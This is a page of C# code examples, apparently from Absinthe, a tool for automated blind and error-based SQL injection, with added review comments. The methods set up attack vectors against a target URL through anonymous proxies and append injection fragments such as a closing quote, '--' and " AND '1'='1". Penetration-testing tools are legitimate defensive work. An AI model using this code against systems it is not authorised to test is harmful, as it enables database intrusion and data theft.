Beispiel #1
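        /// <summary>
        /// Rebuilds the target attack vector from its saved XML form (XML to native type).
        /// </summary>
        /// <remarks>
        /// Returns without changing any state when <paramref name="xInput"/> has no
        /// "attackvector" child. The options handed to the factory are rebuilt from this
        /// object's own fields; only the content of the "attackvector" node is taken from the XML.
        /// NOTE(review): nothing in this method validates the XML content. If the document comes
        /// from a saved file that someone else could have edited, treat it as untrusted input.
        /// </remarks>
        /// <param name="xInput">The XML node to start deserialization</param>
        /// <param name="AnonProxies">Any anonymous proxies being used</param>
        public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
        {
            // The scheme is chosen by the stored SSL flag; _TargetURL carries no scheme of its own.
            string FullUrl = (_UseSSL ? "https://" : "http://") + _TargetURL;

            XmlNode n = xInput.SelectSingleNode("attackvector");
            if (n == null)
            {
                return;
            }

            InjectionOptions opts;
            if (_IsBlind)
            {
                // Build the blind options through a typed local so no downcasts are needed.
                BlindInjectionOptions blindOpts = new BlindInjectionOptions();
                blindOpts.Delimiter = _FilterDelimiter;
                blindOpts.Tolerance = _Tolerance;
                blindOpts.Throttle  = _ThrottleValue;
                opts = blindOpts;
            }
            else
            {
                opts = new ErrorInjectionOptions();
            }

            opts.TerminateQuery = _TerminateQuery;
            opts.WebProxies     = AnonProxies;

            AttackVectorFactory avf = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);
            _TargetAttackVector = avf.BuildFromXml(n, opts, _Plugins.GetPluginByName(_LoadedPluginName));

            // BuildFromXml is not visible here. A deserializer for blind vectors can return null
            // when the XML is incomplete, so presumably this call can too. Subscribing on a null
            // vector would throw NullReferenceException, so only hook the event when one was built.
            if (_TargetAttackVector != null)
            {
                _TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
            }
        }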
Beispiel #2
        /// <summary>
        /// Reads the connection and form settings from the UI, builds the injection options and
        /// runs the preliminary scan that produces the state's target attack vector.
        /// </summary>
        /// <remarks>
        /// Returns early when no connection method is set or when the form parameters yield no
        /// injection point. The initialize button is disabled for the duration of the scan and
        /// re-enabled, together with the default cursor, in the finally block.
        /// </remarks>
        private void InitializeAttackVectors()
        {
            string URL;

            // Scheme comes from the SSL checkbox; the target URL control supplies the rest.
            URL = ctlConnection1.UseSsl == true ? "https://" : "http://";
            URL += ctlConnection1.TargetUrl;

            string Method = ctlConnection1.ConnectMethod;

            // NOTE(review): a null ConnectMethod would throw here rather than return; confirm the control never yields null.
            if (Method.Equals("")) return;

            SafelyChangeCursor(Cursors.WaitCursor);

            // Collect the form parameters: the chosen injection parameter (name and default value)
            // comes back through the ref arguments, the remaining parameters as the return value.
            string TargetName, TargetField;
            bool InjectAsString;
            TargetName = String.Empty; TargetField = String.Empty;

            // These two fresh collections are replaced by the assignments just below.
            NameValueCollection Others = new NameValueCollection();
            NameValueCollection Cookies = new NameValueCollection();

            Others = FormParameters.FormParameters(ref TargetName, ref TargetField, out InjectAsString);
            Cookies = FormParameters.Cookies;

            // An empty target name means no parameter was marked as the injection point.
            if (TargetName.Equals(String.Empty))
            {
                UserStatus("No Injection Point Found");
                SafelyChangeCursor(Cursors.Default);
                return;
            }

            UserStatus("Beginning Preliminary Scan");

            try
            {
                SafelyChangeEnableOfControl(butInitializeInjection, false);

                AttackVectorFactory avf;

                // Pick the options subtype from the selected mode, then fill the shared settings.
                InjectionOptions opts;
                if (optBlindInjection.Checked == true)
                {
                    opts = new BlindInjectionOptions();

                    ((BlindInjectionOptions)opts).Tolerance = _AbsintheState.FilterTolerance;
                    ((BlindInjectionOptions)opts).Delimiter = _AbsintheState.FilterDelimiter;
                }
                else
                {
                    opts = new ErrorInjectionOptions();
                    ((ErrorInjectionOptions)opts).VerifyVersion = chkVerifyVersion.Checked;
                }

                opts.TerminateQuery = _AbsintheState.TerminateQuery;
                opts.Cookies = Cookies;
                opts.WebProxies = _AppSettings.ProxyQueue();
                opts.InjectAsString = InjectAsString;
                opts.UserAgent = _AbsintheState.UserAgent;

                // NOTE(review): from here on opts carries the operator's network credential and
                // session cookies; confirm nothing downstream logs or serializes the options object.
                opts.AuthCredentials = ctlUserAuth1.NetworkCredential;
                opts.AppendedQuery = _AbsintheState.AppendedText;

                avf = new AttackVectorFactory(URL, TargetName, TargetField, Others, Method, opts);
                avf.UserStatus += new UserEvents.UserStatusEventHandler(UserStatus);

                // Array.IndexOf yields -1 when the loaded plugin name is not among the entries.
                int PluginNumber = Array.IndexOf(_PluginEntries, _AbsintheState.LoadedPluginName);

                IPlugin pt = null;

                if (optBlindInjection.Checked)
                {
                    // Find the blind-capable plugin whose display name matches the loaded plugin.
                    foreach (IPlugin bp in _AbsintheState.PluginList)
                    {
                        if (bp.GetType().GetInterface("IBlindPlugin") != null)
                        {
                            if (bp.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
                            {
                                pt = (IPlugin)bp;
                                break;
                            }
                        }
                    }

                    // NOTE(review): unlike the error-based branch there is no null check on pt, so
                    // a null plugin is passed on when nothing matched; confirm the factory tolerates that.
                    _AbsintheState.TargetAttackVector = avf.BuildBlindSqlAttackVector(_AbsintheState.FilterTolerance, (IBlindPlugin)pt);
                    UserStatus("Finished initial scan");
                }
                else if (optErrorBasedInjection.Checked)
                {
                    // Index 0 and "not found" (-1) both fall back to auto-detection.
                    // NOTE(review): presumably entry 0 is an auto-detect placeholder; verify against _PluginEntries.
                    if (PluginNumber <= 0)
                    {
                        pt = AutoDetectPlugin(avf);
                    }
                    else
                    {
                        foreach (IPlugin ep in _AbsintheState.PluginList)
                        {
                            if (ep.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
                            {
                                pt = (IPlugin)ep;
                                break;
                            }
                        }
                    }
                    if (pt != null)
                    {
                        try
                        {
                            // NOTE(review): the name-only match above does not check for IErrorPlugin, so
                            // this cast can throw InvalidCastException, which the outer catch would report.
                            _AbsintheState.TargetAttackVector = avf.BuildSqlErrorAttackVector((IErrorPlugin)pt);
                            UserStatus("Finished initial scan");
                        }
                        catch (UnsupportedSQLErrorVersionException sqlex)
                        {
                            // Show the error report dialog via this.Invoke, passing both captured pages.
                            // NOTE(review): presumably Control.Invoke marshalling to the UI thread; confirm.
                            ErrorReportingDelegate ts = new ErrorReportingDelegate(ThreadUnsafeDisplayErrorReportDialog);
                            this.Invoke(ts, new object[] { sqlex.VersionErrorPageHtml, sqlex.HavingErrorPageHtml });
                        }
                    }
                }

            }
            catch (Exception e)
            {
                // Any other failure: full details go to the debug output, only the message to the user.
                System.Diagnostics.Debug.WriteLine(e.ToString());
                UserStatus(e.Message);
            }
            finally
            {
                // Always restore the button and cursor, whether the scan succeeded or not.
                SafelyChangeEnableOfControl(butInitializeInjection, true);
                SafelyChangeCursor(Cursors.Default);
            }
        }
        /// <summary>
        /// Rebuilds a blind SQL attack vector from its XML node.
        /// </summary>
        /// <remarks>
        /// The "truepage", "falsepage", "truefilter" and "falsefilter" children are all required;
        /// if any is missing the method returns null. Optional attributes on the node override the
        /// matching fields of <paramref name="opts"/> in place, so the caller's object is modified.
        /// NOTE(review): Single.Parse and Boolean.Parse throw on malformed attribute text, and
        /// Single.Parse uses the current culture. A hand-edited file, or one written under another
        /// locale, may fail to load; confirm how the writer formats these values.
        /// </remarks>
        /// <param name="VectorNode">The XML node holding the serialized vector</param>
        /// <param name="opts">Blind injection options, updated from the node's attributes</param>
        /// <param name="PluginUsed">The plugin handed to the new vector</param>
        /// <returns>The rebuilt vector, or null when a required child node is missing</returns>
        private BlindSqlAttackVector DeserializeBlindSqlAttackVectorXml(XmlNode VectorNode, BlindInjectionOptions opts, IBlindPlugin PluginUsed)
        {
            double[] truePageSig  = null;
            double[] falsePageSig = null;
            int[]    trueIndices  = null;
            int[]    falseIndices = null;

            // Children with any other name are ignored; a repeated name overwrites the earlier value.
            foreach (XmlNode child in VectorNode.ChildNodes)
            {
                string tag = child.Name;

                if (tag == "truepage")
                {
                    truePageSig = ExtractSignatureFromXml(child);
                }
                else if (tag == "falsepage")
                {
                    falsePageSig = ExtractSignatureFromXml(child);
                }
                else if (tag == "truefilter")
                {
                    trueIndices = ExtractFilterFromXml(child);
                }
                else if (tag == "falsefilter")
                {
                    falseIndices = ExtractFilterFromXml(child);
                }
            }

            bool complete = truePageSig != null && falsePageSig != null
                            && trueIndices != null && falseIndices != null;
            if (!complete)
            {
                return null;
            }

            string vectorName   = String.Empty;
            string vectorBuffer = String.Empty;

            // Attribute names are case-sensitive and are read exactly as the file spells them.
            XmlAttribute attr = VectorNode.Attributes["Delimiter"];
            if (attr != null)
            {
                opts.Delimiter = attr.InnerText;
            }

            attr = VectorNode.Attributes["tolerance"];
            if (attr != null)
            {
                opts.Tolerance = System.Single.Parse(attr.InnerText);
            }

            attr = VectorNode.Attributes["name"];
            if (attr != null)
            {
                vectorName = attr.InnerText;
            }

            attr = VectorNode.Attributes["buffer"];
            if (attr != null)
            {
                vectorBuffer = attr.InnerText;
            }

            attr = VectorNode.Attributes["InjectAsString"];
            if (attr != null)
            {
                opts.InjectAsString = System.Boolean.Parse(attr.InnerText);
            }

            return new BlindSqlAttackVector(_TargetURL, vectorName, vectorBuffer, _AttackParams, _Method, PluginUsed,
                                            truePageSig, falsePageSig, trueIndices, falseIndices, opts);
        }
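		///<summary>Creates a vector from already-known page signatures and filters (used when restoring a saved vector).</summary>
		///<remarks>
		/// The suffix appended after the injected text is chosen in this order: the "--" terminator when
		/// TerminateQuery is set, otherwise the AppendedQuery text when there is any, otherwise a
		/// string-closing clause when InjectAsString is set. A null AppendedQuery is treated as empty.
		///</remarks>
		///<param name="URL">The URL of the target web application, including file path</param>
		///<param name="VectorName">The name of the parameter to use as the injection point</param>
		///<param name="VectorBuffer">The default value to store in the injectable parameter</param>
		///<param name="AdditionalParams">All parameters (names and values) that are used, but not chosen as injection points</param>
		///<param name="Method">The HTTP connection method. This can be "GET" or "POST"</param>
		///<param name="PluginUsed">The Plugin being used for the connection</param>
		///<param name="TruePage">The signature for the page representing a "true" value</param>
		///<param name="FalsePage">The signature for the page representing a "false" value</param>
		///<param name="TrueFilterIn">The indices of the signature relevant for comparing an unknown to the true signature</param>
		///<param name="FalseFilterIn">The indices of the signature relevant for comparing an unknown to the false signature</param>
		///<param name="Options">The InjectionOptions to use for all requests</param>
		public BlindSqlAttackVector(string URL, string VectorName, string VectorBuffer, NameValueCollection AdditionalParams, string Method, IBlindPlugin PluginUsed,
				double[] TruePage, double[] FalsePage, 
				int[] TrueFilterIn, int[] FalseFilterIn, BlindInjectionOptions Options)
		{
			// The method name is a protocol token, so upper-case it with the invariant culture
			// rather than the machine's current culture.
			_ConnectViaPost = String.Equals(Method.ToUpper(System.Globalization.CultureInfo.InvariantCulture), "POST");
			_TargetURL = URL;
			_VectorName = VectorName;
			_VectorBuffer = VectorBuffer;
			_Options = Options;
			_PluginData = PluginUsed;
			
			if (_Options.InjectAsString) _VectorBuffer += "'";
			
			_AttackParams = AdditionalParams;

			TruePageSignature = TruePage;
			FalsePageSignature = FalsePage;
			TrueFilter = TrueFilterIn;
			FalseFilter = FalseFilterIn;
			
			_VectorPostBuffer = String.Empty;
			if (_Options.TerminateQuery)
			{
				_VectorPostBuffer += "--";
			}
			// Some callers build the options without assigning AppendedQuery; if its default is
			// null (not visible here) the bare .Length read would throw, so check for null first.
			else if (_Options.AppendedQuery != null && _Options.AppendedQuery.Length > 0)
			{
				_VectorPostBuffer += _Options.AppendedQuery;
			}
			else if (_Options.InjectAsString)
			{
				_VectorPostBuffer = " AND '1'='1";
			}


			_VectorBuffer += " "; // Required so plugins aren't required to add the spaces
			_Proxies = Options.WebProxies;

			// NOTE(review): if ParsePage.UserStatus is a static event, every instance stays
			// subscribed for the life of the process; confirm and unsubscribe where appropriate.
			ParsePage.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
		}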
		///<summary>Creates a vector that has no page signatures or filters yet.</summary>
		///<remarks>
		/// A null plugin is reported through UserStatus but still stored.
		/// NOTE(review): if UserStatus is an instance event, it cannot have subscribers yet inside
		/// the constructor, and raising it would throw; confirm what UserStatus resolves to in this class.
		///</remarks>
		///<param name="URL">The URL of the target web application, including file path</param>
		///<param name="VectorName">The name of the parameter to use as the injection point</param>
		///<param name="VectorBuffer">The default value to store in the injectable parameter</param>
		///<param name="AdditionalParams">All parameters (names and values) that are used, but not chosen as injection points</param>
		///<param name="Method">The HTTP connection method. This can be "GET" or "POST"</param>
		///<param name="PluginUsed">The Plugin being used for the connection</param>
		///<param name="Options">The InjectionOptions to use for all connections</param>
		public BlindSqlAttackVector(string URL, string VectorName, string VectorBuffer, NameValueCollection AdditionalParams, string Method, IBlindPlugin PluginUsed,
				BlindInjectionOptions Options)
		{
			_Proxies = Options.WebProxies;

			if (PluginUsed == null)
			{
				UserStatus("Null plugin");
			}

			_PluginData = PluginUsed;
			_Options = Options;

			// Any casing of "post" selects POST; every other value means GET.
			string upperMethod = Method.ToUpper();
			_ConnectViaPost = (upperMethod == "POST");

			_TargetURL = URL;
			_VectorName = VectorName;

			// String-typed injection points get a single quote appended to the default value.
			_VectorBuffer = VectorBuffer;
			if (_Options.InjectAsString)
			{
				_VectorBuffer = _VectorBuffer + "'";
			}

			_AttackParams = AdditionalParams;

			ParsePage.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
		}
		/// <summary>
		/// Rebuilds a blind SQL attack vector from its XML node.
		/// </summary>
		/// <remarks>
		/// Returns null unless the node has all four of the "truepage", "falsepage", "truefilter" and
		/// "falsefilter" children. Optional attributes on the node are written into
		/// <paramref name="opts"/>, which changes the caller's object.
		/// NOTE(review): Single.Parse and Boolean.Parse throw on malformed attribute text, and
		/// Single.Parse uses the current culture; confirm the writer's format before trusting
		/// files that were edited by hand or produced under another locale.
		/// </remarks>
		/// <param name="VectorNode">The XML node holding the serialized vector</param>
		/// <param name="opts">Blind injection options, updated from the node's attributes</param>
		/// <param name="PluginUsed">The plugin handed to the new vector</param>
		/// <returns>The rebuilt vector, or null when a required child node is missing</returns>
		private BlindSqlAttackVector DeserializeBlindSqlAttackVectorXml(XmlNode VectorNode, BlindInjectionOptions opts, IBlindPlugin PluginUsed)
		{
			double[] sigTrue = null;
			double[] sigFalse = null;
			int[] filterTrue = null;
			int[] filterFalse = null;

			// Unrecognised child names are skipped.
			foreach (XmlNode part in VectorNode.ChildNodes)
			{
				string partName = part.Name;

				if (partName == "truepage")
				{
					sigTrue = ExtractSignatureFromXml(part);
				}
				else if (partName == "falsepage")
				{
					sigFalse = ExtractSignatureFromXml(part);
				}
				else if (partName == "truefilter")
				{
					filterTrue = ExtractFilterFromXml(part);
				}
				else if (partName == "falsefilter")
				{
					filterFalse = ExtractFilterFromXml(part);
				}
			}

			// All four pieces are mandatory.
			if (sigTrue == null) return null;
			if (sigFalse == null) return null;
			if (filterTrue == null) return null;
			if (filterFalse == null) return null;

			string parsedName = String.Empty;
			string parsedBuffer = String.Empty;

			XmlAttribute current = VectorNode.Attributes["Delimiter"];
			if (current != null)
			{
				opts.Delimiter = current.InnerText;
			}

			current = VectorNode.Attributes["tolerance"];
			if (current != null)
			{
				opts.Tolerance = System.Single.Parse(current.InnerText);
			}

			current = VectorNode.Attributes["name"];
			if (current != null)
			{
				parsedName = current.InnerText;
			}

			current = VectorNode.Attributes["buffer"];
			if (current != null)
			{
				parsedBuffer = current.InnerText;
			}

			current = VectorNode.Attributes["InjectAsString"];
			if (current != null)
			{
				opts.InjectAsString = System.Boolean.Parse(current.InnerText);
			}

			return new BlindSqlAttackVector(_TargetURL, parsedName, parsedBuffer, _AttackParams, _Method, PluginUsed,
					sigTrue, sigFalse, filterTrue, filterFalse, opts);
		}
Beispiel #7
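        /// <summary>
        /// Rebuilds the target attack vector from its saved XML form (XML to native type).
        /// </summary>
        /// <remarks>
        /// Does nothing when <paramref name="xInput"/> has no "attackvector" child. The injection
        /// options are rebuilt from this object's fields; only the "attackvector" node's content
        /// comes from the XML.
        /// NOTE(review): the XML content is not validated in this method; treat a saved file that
        /// others could have edited as untrusted input.
        /// </remarks>
        /// <param name="xInput">The XML node to start deserialization</param>
        /// <param name="AnonProxies">Any anonymous proxies being used</param>
		public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
		{
			// Scheme follows the stored SSL flag.
			string FullUrl = (_UseSSL ? "https://" : "http://") + _TargetURL;

			XmlNode n = xInput.SelectSingleNode("attackvector");
			if (n == null)
			{
				return;
			}

			InjectionOptions opts;
			if (_IsBlind)
			{
				// A typed local avoids the repeated downcasts.
				BlindInjectionOptions blindOpts = new BlindInjectionOptions();
				blindOpts.Delimiter = _FilterDelimiter;
				blindOpts.Tolerance = _Tolerance;
				blindOpts.Throttle = _ThrottleValue;
				opts = blindOpts;
			}
			else
			{
				opts = new ErrorInjectionOptions();
			}

			opts.TerminateQuery = _TerminateQuery;
			opts.WebProxies = AnonProxies;

			AttackVectorFactory avf = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);
			_TargetAttackVector = avf.BuildFromXml(n, opts, _Plugins.GetPluginByName(_LoadedPluginName));

			// BuildFromXml is not visible here; it presumably returns null for incomplete XML.
			// Hooking the event on a null vector would throw NullReferenceException.
			if (_TargetAttackVector != null)
			{
				_TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
			}
		}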